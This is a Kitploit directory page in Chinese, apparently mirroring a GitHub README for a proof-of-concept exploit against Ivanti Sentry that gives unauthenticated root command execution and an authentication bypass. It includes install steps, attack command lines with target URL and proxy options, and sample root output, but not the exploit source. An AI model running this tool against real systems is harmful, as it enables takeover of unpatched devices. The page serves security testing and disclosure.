Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
工具/GitHubGitHub/0xblackash/cve-2026-10520
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

查看仓库
4503个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🎯 CVE-2026-10520 与 CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Critical RCE

无需认证的远程代码执行 + 身份验证绕过

作者: Ashraf Zaryouh "0xBlackash"

GitHub


📌 概述

影响 Ivanti Sentry(原 MobileIron Sentry)的两个严重漏洞:

  • CVE-2026-10520 → CVSS 10.0 - 无需认证的操作系统命令注入(以 root 权限执行 RCE)
  • CVE-2026-10523 → CVSS 9.9 - 身份验证绕过

这些漏洞允许未认证的攻击者完全攻陷系统。


✨ 功能特性

  • ✅ 简洁快速的 PoC
  • ✅ 无需认证(无需凭据)
  • ✅ 以 root 权限执行命令
  • ✅ 详细输出格式
  • ✅ 代理支持
  • ✅ 详细模式
  • ✅ 美观的终端界面

🚀 使用方法

root@kitploit:~
python3 CVE-2026-10520.py --url <目标> --cmd <命令>

示例

root@kitploit:~
# 基本用法
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# 详细模式
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# 使用代理
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# 查看内核版本
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 参数选项


🛠️ 安装

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 成功利用示例

当目标存在漏洞时,你将看到:

root@kitploit:~

 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC 漏洞利用程序
          Ivanti Sentry 无需认证 RCE + 身份验证绕过
          
          作者:Ashraf Zaryouh "0xBlackash"
          GitHub:https://github.com/0xBlackash


[+] 目标存在漏洞!
命令输出:
uid=0(root) gid=0(root) groups=0(root)

⚠️ 免责声明

此工具仅供教育和授权安全测试使用。
未经授权使用于你未拥有的系统是违法行为。
作者对滥用行为不承担任何责任。


🔧 受影响版本

  • Ivanti Sentry 10.5.2、10.6.2、10.7.1 之前的版本

已在以下版本修复: 10.5.2 / 10.6.2 / 10.7.1


📜 参考资料

  • Ivanti 官方安全公告
  • watchTowr Labs 原始研究报告
  • NVD 条目:CVE-2026-10520、CVE-2026-10523

由 Ashraf Zaryouh "0xBlackash" 用心制作 ❤️

如果你觉得有用,请给这个仓库点个星! ⭐

下载工具
参数描述必需
--url目标 URL(例如 https://target:8443)是
--cmd要执行的命令是
-v, --verbose启用详细输出否
--proxyHTTP 代理(host:port)否